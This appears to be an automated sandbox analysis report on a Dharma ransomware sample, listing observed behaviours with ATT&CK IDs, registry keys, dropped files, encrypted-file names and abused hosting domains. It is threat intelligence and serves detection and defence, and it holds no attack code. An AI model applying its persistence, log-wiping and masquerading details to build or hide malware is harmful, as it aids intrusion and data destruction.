dharma | hxxp://melbet[.]com

max time kernel
819s
max time network
979s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2025, 17:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://melbet.com

Score

10^/10

dharma bootkit credential_access defense_evasion discovery execution impact lateral_movement persistence privilege_escalation ransomware spyware stealer

Malware Config

Signatures

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
Dharma family
dharma

Clears Windows event logs 1 TTPs 64 IoCs

defense_evasion ransomware

Clear Windows Event Logs

T1070.001

pid	Process
11060	wevtutil.exe
8632	wevtutil.exe
10004	Process not Found
10672	wevtutil.exe
9348	wevtutil.exe
11792	wevtutil.exe
7308	wevtutil.exe
8604	wevtutil.exe
11180	wevtutil.exe
9448	Process not Found
6296	Process not Found
11792	wevtutil.exe
2468	wevtutil.exe
7032	wevtutil.exe
6208	wevtutil.exe
11168	wevtutil.exe
3728	wevtutil.exe
10040	wevtutil.exe
5996	Process not Found
4840	wevtutil.exe
12284	Process not Found
8928	wevtutil.exe
9732	wevtutil.exe
3648	wevtutil.exe
11244	wevtutil.exe
11388	wevtutil.exe
10340	wevtutil.exe
9840	wevtutil.exe
8088	wevtutil.exe
7592	wevtutil.exe
8696	wevtutil.exe
7052	wevtutil.exe
10832	Process not Found
10588	Process not Found
7332	wevtutil.exe
6684	wevtutil.exe
5128	wevtutil.exe
6744	wevtutil.exe
12248	wevtutil.exe
11936	wevtutil.exe
10920	Process not Found
6780	Process not Found
11144	wevtutil.exe
10628	wevtutil.exe
11040	wevtutil.exe
7668	wevtutil.exe
8176	wevtutil.exe
11824	wevtutil.exe
7004	Process not Found
8148	Process not Found
9552	wevtutil.exe
3360	Process not Found
9944	Process not Found
11892	wevtutil.exe
6512	wevtutil.exe
5356	Process not Found
6348	Process not Found
8004	wevtutil.exe
6372	wevtutil.exe
4840	wevtutil.exe
11620	wevtutil.exe
10692	Process not Found
8908	Process not Found
9708	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
8896	net.exe
7796	net1.exe

Renames multiple (716) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Disables Task Manager via registry modification
defense_evasion

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\sxwkiyeefcobuzdfb\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\sxwkiyeefcobuzdfb.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\erexdgzqeuzcpc\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\erexdgzqeuzcpc.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\agruzawdrtcynl\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\agruzawdrtcynl.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\pverubcretemktj\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\pverubcretemktj.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Documents\\Dharma\\mssqlaq.sys"	mssql.exe

Checks computer location settings 2 TTPs 17 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	unlocker.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	LogDelete.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	1sass.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	Process not Found
Key value queried	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation	loader.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	1sass.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1sass.exe	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	1sass.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 33 IoCs

pid	Process
3036	1sass.exe
3684	mssql2.exe
1436	nc123.exe
3904	mssql.exe
6172	SearchHost.exe
6768	unlocker.exe
7752	unlocker.tmp
8640	LogDelete.exe
8080	loader.exe
6484	MouseLock.exe
2512	Process not Found
10600	Process not Found
8204	Process not Found
9980	Process not Found
11340	Process not Found
9472	Process not Found
10512	Process not Found
10540	Process not Found
11128	Process not Found
7236	Process not Found
7488	Process not Found
8384	Process not Found
5860	Process not Found
7936	Process not Found
3648	Process not Found
8636	Process not Found
7588	Process not Found
9712	Process not Found
7732	Process not Found
11208	Process not Found
8484	Process not Found
5384	Process not Found
8376	Process not Found

Impair Defenses: Safe Mode Boot 1 TTPs 8 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\erexdgzqeuzcpc.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\EREXDGZQEUZCPC.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\agruzawdrtcynl.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\AGRUZAWDRTCYNL.SYS	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\PVERUBCRETEMKTJ.SYS	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\pverubcretemktj.sys	mssql.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sxwkiyeefcobuzdfb.sys	mssql.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\SXWKIYEEFCOBUZDFB.SYS	mssql.exe

Loads dropped DLL 24 IoCs

pid	Process
7752	unlocker.tmp
2512	Process not Found
11052	Process not Found
3332	Process not Found
10600	Process not Found
11340	Process not Found
9472	Process not Found
9472	Process not Found
10540	Process not Found
10540	Process not Found
7236	Process not Found
7488	Process not Found
5860	Process not Found
8384	Process not Found
7936	Process not Found
8636	Process not Found
3648	Process not Found
7588	Process not Found
9712	Process not Found
7732	Process not Found
11208	Process not Found
8484	Process not Found
5384	Process not Found
8376	Process not Found

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}"	Process not Found

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\""	1sass.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1sass.exe = "C:\\Windows\\System32\\1sass.exe"	1sass.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""	1sass.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\desktop.ini	1sass.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	1sass.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	1sass.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	1sass.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	1sass.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	1sass.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2593460650-190333679-3676257533-1000\desktop.ini	1sass.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	1sass.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2593460650-190333679-3676257533-1000\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	1sass.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	1sass.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	1sass.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	1sass.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	1sass.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	1sass.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	1sass.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	SearchHost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
354	drive.google.com
355	drive.google.com
349	camo.githubusercontent.com
353	drive.google.com

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Power Settings 1 TTPs 1 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
8396	wevtutil.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Process not Found

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x003f00000002356e-11139.dat	autoit_exe
behavioral1/files/0x00070000000248c3-11082.dat	autoit_exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\1sass.exe	1sass.exe
File created	C:\Windows\System32\Info.hta	1sass.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\landing_page_whats_new_v1.png	1sass.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\System.Windows.Forms.Primitives.resources.dll	1sass.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Close2x.png.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\api-ms-win-core-synch-l1-2-0.dll	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART3.BDR.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\it\Microsoft.PackageManagement.MetaProvider.PowerShell.resources.dll.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files\7-Zip\Lang\gl.txt.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN010.XML	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalSplashScreen.scale-200.png	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-24_altform-unplated_contrast-black.png	1sass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\remove.svg	1sass.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\ro.pak	1sass.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Windows.Forms.Design.Editors.dll	1sass.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\wsdetect.dll	1sass.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info.png.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul.xrm-ms	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENES\MSB1ENES.ITS.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ml.pak.DATA.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.office32mui.msi.16.en-us.xml	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-400_contrast-white.png	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x64__8wekyb3d8bbwe\logo.png	1sass.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\sunjce_provider.jar.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-140.png.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp5-ul-phn.xrm-ms.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTest-ul-oob.xrm-ms.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\Microsoft.VisualBasic.Forms.resources.dll.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1XTOR.DLL.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.AddIn.Contract.dll	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-60_altform-unplated.png	1sass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\ui-strings.js.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\images\cursors\cursors.properties.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ONLNTCOMLIB.DLL.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\es-419.pak.DATA.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-36.png	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\stickers\word_art\sticker33.png	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\PreviewMailList.png	1sass.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\PresentationUI.dll.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\MSOSEC.DLL.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\System.Data.Linq.Resources.dll	1sass.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe	1sass.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\mscorrc.dll	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailBadge.scale-150.png	1sass.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans\System.Windows.Forms.Design.resources.dll	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymxb.ttf	1sass.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.el-gr.dll.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\hostpolicy.dll.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL109.XML	1sass.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\cs-cz\ui-strings.js.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Cryptomining.DATA.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files\7-Zip\Lang\co.txt.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\StoreLogo.png.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\jsaddins\onenote-winrt-16.00.js	1sass.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Runtime.Loader.dll.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-32_altform-unplated_contrast-white.png	1sass.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\ui-strings.js.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\FileExtension.targetsize-63.png	1sass.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms.id-F6ED3317.[[email protected]].ROGER	1sass.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Data.Services.resources.dll	1sass.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].ROGER	1sass.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
